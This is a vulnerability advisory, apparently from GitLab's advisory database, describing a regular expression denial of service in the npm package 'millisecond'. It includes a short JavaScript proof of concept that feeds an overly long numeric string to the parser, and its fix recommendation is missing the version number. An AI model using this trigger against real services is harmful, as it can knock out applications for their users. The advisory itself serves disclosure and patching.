GMS-2021-37: Regular Expression Denial of Service in millisecond

September 22, 2021

Versions of millisecond are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed. ## Proof of concept

var ms = require('millisecond');
var genstr = function (len, chr) {
 var result = "";
 for (i=0; i<=len; i++) {
 result = result + chr;
 }

 return result;
}

ms(genstr(process.argv[2], "5") + " minutea");
``` ## Recommendation

Update to or later.

References

github.com/advisories/GHSA-m489-xr35-fjxr
github.com/unshiftio/millisecond/pull/4
www.npmjs.com/advisories/59

Code Behaviors & Features

Detect and mitigate GMS-2021-37 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →